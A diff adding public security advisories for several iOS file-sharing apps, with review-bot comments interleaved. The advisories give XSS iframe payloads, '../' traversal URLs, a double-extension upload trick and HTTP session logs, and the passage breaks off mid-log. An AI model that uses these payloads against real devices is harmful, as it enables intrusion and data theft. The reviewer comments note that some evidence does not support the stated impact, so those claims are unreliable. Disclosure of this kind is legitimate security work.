@@ -0,0 +1,306 @@ +# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: http://dropouts.in/ +# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 +# CVE: N/A + +Document Title: +=============== +SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2202 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2202 + + +Common Vulnerability Scoring System: +==================================== +4.6 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Backup all your iPhone or iPad contacts in 1 tap and export them. +Fastest way to restore contacts from PC or Mac. +Export by mailing the backed up contacts file to yourself. Export +contacts file to any other app on your device. +Export all contacts directly to your PC / Mac over Wifi, no software +needed! Restore any contacts directly from +PC / Mac. Restore contacts via mail. Get the ultimate contacts backup +app now. + +(Copy of the Homepage: +https://apps.apple.com/us/app/super-backup-export-import/id1052684097 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent cross site web vulnerabilities in the official SuperBackup +v2.0.5 ios mobile application. 
+ + +Affected Product(s): +==================== +Dropouts Technologies LLP +Product: Super Backup v2.0.5 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A persistent cross site scripting web vulnerability has been discovered +in the official SuperBackup v2.0.5 ios mobile application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise the mobile +web-application from the application-side. + +The cross site scripting web vulnerabilities are located in the +`newPath`, `oldPath` & `filename` parameters of the vcf listing module. +Remote attackers are able to inject own malicious persistent script +codes as vcf filename to the main index list. The request method to +inject is POST and the attack vector of the vulnerability is located on +the application-side. The injection point is located at the vcf +filename or import. The execution point occurs in the main index list +after the import or insert. + +Remote attackers are able to inject own script codes to the client-side +requested vulnerable web-application parameters. The attack +vector of the vulnerability is persistent and the request method to +inject/execute is POST. The vulnerabilities are classic client-side +cross site scripting vulnerabilities. 
Successful exploitation of the +vulnerability results in session hijacking, persistent phishing +attacks, persistent external redirects to malicious source and +persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] VCF + +Vulnerable Parameter(s): +[+] newPath (path - vcf filename) +[+] oldPath (path - vcf filename) + + +Proof of Concept (PoC): +======================= +The cross site scripting vulnerability can be exploited by remote +attackers without privileged user account and with low user interaction. +For security demonstration or to reproduce the cross site scripting +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload (Filename) +>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe> + + +PoC: Vulnerable Source (Listing - Index) +<button type="button" class="btn btn-default btn-xs button-download"> +<span class="glyphicon glyphicon-download-alt"></span> +</button> +</td> +<td class="column-name"><p class="edit" title="Click to +rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td> +<td class="column-size"> +<p>26.40 KB</p> +</td> +<td class="column-delete"> +<button type="button" class="btn btn-danger btn-xs button-delete"> +<span class="glyphicon glyphicon-trash"></span> +</button> +</td> +</tr></tbody></table> +</div> + + +PoC: Exception-Handling +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe> +09:17:12:PM 10:Apr.:2020 .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source +onload=alert("PWND")></iframe> .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"<iframe src=evil.source +onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf" + + +PoC: Exploit +BEGIN:VCARD +VERSION:3.0 
+PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN +B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;; +END:VCARD + + +--- PoC Session Logs [POST] --- +http://localhost/move +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 187 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf&newPath=/evil-filename>"<iframe src=evil.source +onload=alert("PWND")></iframe>.vc +- +POST: HTTP/1.1 500 Internal Server Error +Content-Length: 593 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +- +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://localhost/ +- +GET: HTTP/1.1 200 OK +Server: GCDWebUploader +Connection: Close + + +Solution - Fix & Patch: +======================= +1. Parse and filter the vcf name values next to add, edit or imports to +prevent an execution +2. Restrict and filter in the index listing the vcf names to sanitize +the output + + +Security Risk: +============== +The security risk of the persistent vcf cross site scripting web +vulnerability is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. 
+ + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. 
To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt new file mode 100644 index 000000000..6063109bf --- /dev/null +++ b/exploits/ios/webapps/48327.txt 
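Review bot: The evidence shown does not yet demonstrate the payload executing in the listing: the `/move` request returns `HTTP/1.1 500 Internal Server Error`, the `Vulnerable Source (Listing - Index)` excerpt contains only the benign `Contacts 09:17:12:PM 10:Apr.:2020 .vcf` name, and the only place the payload appears is the `Internal Server Error: Failed moving` body returned to an `X-Requested-With: XMLHttpRequest` call, where it is not obviously rendered as HTML. The listing HTML with `evil.source` present (or the index page itself issuing the follow-up `GET /evil.source`, rather than the researcher) is needed to support `Persistent` rather than reflected-in-error-message. The narrative names a `filename` parameter that the `Vulnerable Parameter(s)` list omits, and the vCard PoC uses `B:Kunz Mejri ...`, which is not a vCard 3.0 property — presumably `N:` was intended, worth confirming since the import path is the claimed pre-auth vector.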
@@ -0,0 +1,245 @@ +# Title: File Transfer iFamily 2.1 - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +File Transfer iFamily v2.1 - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2199 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2199 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Class: +==================== +Directory- or Path-Traversal + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Send photos, videos and documents to other devices without Internet. A +complete application to exchange files +wirelessly between devices. It uses the Multipeer Connectivity Framework +to search and connect to available devices, +without the need of internet connection or any kind of server and database. + +(Copy of the Homepage: +https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory +traversal web vulnerability in the official File Transfer iFamily v2.1 +ios mobile application. 
+ + +Affected Product(s): +==================== +DONG JOO CHO +Product: File Transfer iFamily v2.1 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official File Transfer iFamily v2.1 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local ./etc/ path of the web-server by +changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches a final slash to its request and the path can be accessed via +web-browser to download local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. 
+ + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +http://localhost//../ + + +--- PoC Session Logs [GET]] --- +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 +- +http://localhost../etc/ +Host: localhost.. 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- add slash to correct host adress (/.././) +http://localhost/./ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- Access granted +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a restriction of the visible and +accessable ./etc/ path in the app container. +Disallow path changes in the client-side get method requests and +validate them securely. + + +Security Risk: +============== +The security risk of the directory travsersal web vulnerability in the +ios mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. 
Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ \ No newline at end of file diff --git a/exploits/ios/webapps/48340.txt b/exploits/ios/webapps/48340.txt new file mode 100644 index 000000000..2960d2761 --- /dev/null +++ b/exploits/ios/webapps/48340.txt 
@@ -0,0 +1,423 @@ +# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +# CVE: N/A + +Document Title: +=============== +Playable v9.18 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2198 + + +Release Date: +============= +2020-04-16 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2198 + + +Common Vulnerability Scoring System: +==================================== +7.3 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod +Touch without conversion - +just copy files to your device through iTunes or over Wifi! To search +for closed captions / +subtitles select a video then press the magnifying glass icon to the top +right of the video. + +(Copy of the Homepage: +https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +vulnerabilities in the official Playable v9.18 apple ios mobile application. 
+ + +Affected Product(s): +==================== +Portable Ltd +Product: Playable v9.18 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-16: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 +A persistent script code injection web vulnerability has been discovered +in the official Playable v9.18 apple ios mobile application. +The vulnerability allows remote attackers to inject own malicious +persistent script codes to the application-side for manipulation. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform uploads +with malicious script code to manipulation the mobile application ui. +The request method to inject is POST and the attack vector of +the vulnerability is persistent. Attackers are able to inject html and +javascript codes to comrpomise the mobile wifi web-application. +The injection point is the upload form on localhost:8881 and the +execution occurs on localhost:80 with the visible ui listing. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected mobile +application modules. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the +official Playable v9.18 apple ios mobile application. 
+The arbitary file upload vulnerability allows remote attackers to upload +malicious files to compromise the mobile application. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform +uploads with malicious file extions to bypass the parse function. In a +second step the attacker requests the local file to +execute the malicious content on the local web-server. The request +method to inject is POST and the attack vector of the +vulnerability is located on the application-side. The injection point is +the upload form on localhost:8881. The execution +point becomes visible by a request the localhost:80/vid/[filename] path +with the uploaded file content. The is present +because of a missing file parse and insecure upload handling on file +extensions. As well the local web-server can be +reconfigured to provide more security on user interactions. + +Successful exploitation of the arbitrary file upload vulnerability +results in a compromise of the local ios mobile application. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + +Affected Module(s): +[+] /vid/ + + +Proof of Concept (PoC): +======================= +1.1 +The persistent script code injection vulnerability can be exploited by +remote attackers with wifi network access without user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Install the ios application +(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034) +2. Start the ios application on your local ios device +3. Start the wifi share service in the application ui +4. Open the web-browser +5. Tamper the http requests +6. Prepare to upload any file and press the upload button +7. Inject as filename any html/js script code payload +8. 
Continue to transmit the POST method request +9. The file executes on the index listing on port 8881 +(http://localhost:8881/index.html) +10. Successful reproduce of the persistent script code injection web +vulnerability! + + +PoC: Exploitation +>"<iframe src=evil.source onload=alert(document.domain)>.jpg + + +--- PoC Session logs [POST] --- +Status: 200[OK] +POST http://localhost:8881/upload +Mime Type[text/html] + Request Header: + Host[localhost:8881] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8881/index.html] + Content-Length[8559] + Content-Type[multipart/form-data; +boundary=---------------------------3823323145734] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------3823323145734 +Content-Disposition: form-data; name="file"; filename=">"<iframe +src=evil.source onload=alert(document.domain)>.jpg" +- +Status: 200[OK] +GET http://localhost/evil.source +Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost/evil.source] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Upgrade-Insecure-Requests[1] + Cache-Control[max-age=0] + Response Header: + Accept-Ranges[bytes] + Content-Length[8559] + + + +1.2 +the arbitrary file upload vulnerability can be exploited by local +attackers with wifi network access without user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Install the ios application +(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034) +2. 
Start the ios application on your local ios device +3. Start the wifi share service in the application ui +4. Open the web-browser +5. Tamper the http requests +6. Prepare a js file with malicious test content +7. Extend the file name with .jpg +Note: The upload mechanism does not parse or checks for multiple +extensions on file uploads +8. Upload the file by pushing the Upload File button +9. Open the url in the default /vid/ folder and remove the .jpg extension +10. The simple js executes in the scripting engine when opening +11. Successful reproduce of the arbitrary file upload vulnerability! +Note: Using the ftp you can perform to create the file via console +ftp://localhost (read/write permissions) + + +PoC: Exploitation +http://localhost/vid/clay.js.jpg + + +--- PoC Session logs [POST] --- +Status: 200[OK] +POST http://localhost:8881/upload +Mime Type[text/html] + Request Header: + Host[localhost:8881] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8881/index.html] + Content-Length[86856] + Content-Type[multipart/form-data; +boundary=---------------------------3823323145733] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------3823323145733 +Content-Disposition: form-data; name="file"; filename="clay.js.jpg" +- +Status: 200[OK] +GET http://localhost/listVideosJson +Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[87] +- +Status: 200[OK] +GET 
http://localhost/vid/clay.js.jpg +Mime Type[application/iosjpg] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost/] + Connection[keep-alive] + Upgrade-Insecure-Requests[1] + Response Header: + Accept-Ranges[bytes] + Content-Length[86670] + Content-Type[application/iosjpg;] +- +Status: 200[OK] +GET http://localhost/vid/clay.js +Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Upgrade-Insecure-Requests[1] + Response Header: + Accept-Ranges[bytes] + Content-Length[0] + + +Solution - Fix & Patch: +======================= +1.1 +The vulnerability can be resolved by a restriction and parse of the +filename parameter. Disallow special chars and restrict inputs. +Encode also the output locations to ensure nobody is able to execute +script code in the main file listing. + +1.2 +Parse the filename for multiple extensions and prevent that attackers +open specific dangerous file extensions that could +compromise the local application path. + + +Security Risk: +============== +1.1 +The security risk of the script code injection web vulnerability in the +mobile ios application is estimated as high. + +1.2 +The security risk of the arbitrary file upload vulnerability in the +mobile ios application is estimated as high. 
+ + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. 
+All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48375.txt b/exploits/ios/webapps/48375.txt new file mode 100644 index 000000000..27dd13c8c --- /dev/null +++ b/exploits/ios/webapps/48375.txt 
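Review bot: The session log for finding 1.2 contradicts the claimed execution: `GET http://localhost/vid/clay.js.jpg` is served as `application/iosjpg` with 86670 bytes, while the follow-up `GET http://localhost/vid/clay.js` (step 9, "remove the .jpg extension") returns `Content-Length[0]`, so nothing in the log shows the server locating or executing the script. As written, the evidence supports a stored-file-with-double-extension issue whose impact depends on a browser sniffing a `.jpg` response as script; the advisory should either state that caveat or add a request in which uploaded content is returned with an executable content type (for example an HTML upload served as text/html). Finding 1.1 is also inconsistent about where the payload fires — 'Technical Details' says execution occurs on localhost:80 while reproduction step 9 says `http://localhost:8881/index.html` — and the two should be reconciled. The `GET http://localhost/evil.source` request in the 1.1 log appears to be what actually demonstrates the injected iframe loading, and it is worth saying so explicitly.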
@@ -0,0 +1,322 @@ +# Title: Sky File 2.1.0 iOS - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-21 +# Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 +# CVE: N/A + +Document Title: +=============== +Sky File v2.1.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2207 + + +Common Vulnerability Scoring System: +==================================== +7.2 + + +Affected Product(s): +==================== +Jin Chen +Product: Sky File v2.1.0 - (iOS) Mobile Web Application +(https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-21: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +1.1 +Multiple persistent cross site scripting vulnerabilities has been +discovered in the official Sky File v2.1.0 mobile ios web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The cross site vulnerability is located in the 'createFolder' module. +Remote attackers with access to the ui via wifi are able +to inject own malicious persistent script code to compromise the +web-application or user credentials. The request method to +inject is POST and the attack vector is located on the application-side. + +Successful exploitation of the vulnerability results session hijacking, +persistent phishing, persistent external redirects and +application-side manipulation of the web context of the affected and +connected device module. + + +1.2 +A directory traversal web vulnerability has been discovered in the +official Sky File v2.1.0 mobile ios web-application. 
+The web vulnerability allows an attacker to unauthorized change the path +or directory to access sensitive application data. + +The directory / path webvulnerability is located in the local ftp server +configuration and path validation with the insecure +access permissions. Normally the anonymous user account is only able to +move inside the main app folder but not above to the +web-server and root application files. In case of the issue remote +attackers are able to connect with anonymous user account +credentials to the wifi ftp server. After that the attacker can use a +misconfiguration in the ftp server of the app path to +transmit a `/null//` path commands after CWD and CDUP navigation via ftp +client. Thus allows the attacker to finally +unauthorized access the main root application path. + +Successful exploitation of the directory traversal vulnerability results +in unauthorized file system access and information disclosure. + + +Proof of Concept (PoC): +======================= +1.1 +The persistent script code inject vulnerability can be exploited by +remote attackers with wifi network access with low user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. 
+ + +PoC: Payload +%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:10000/create +Mime Type[application/json] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Content-Type[application/x-www-form-urlencoded; charset=UTF-8] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:10000/] + Content-Length[140] + Connection[keep-alive] + POST-Daten: + +path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E] + Response Header: + Cache-Control[no-cache] + Content-Length[2] + Content-Type[application/json] + Connection[Close] + Server[GCDWebUploader] +- +Status: 200[OK] +GET +http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E +Mime Type[application/json] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[application/json, text/javascript, */*; q=0.01] + 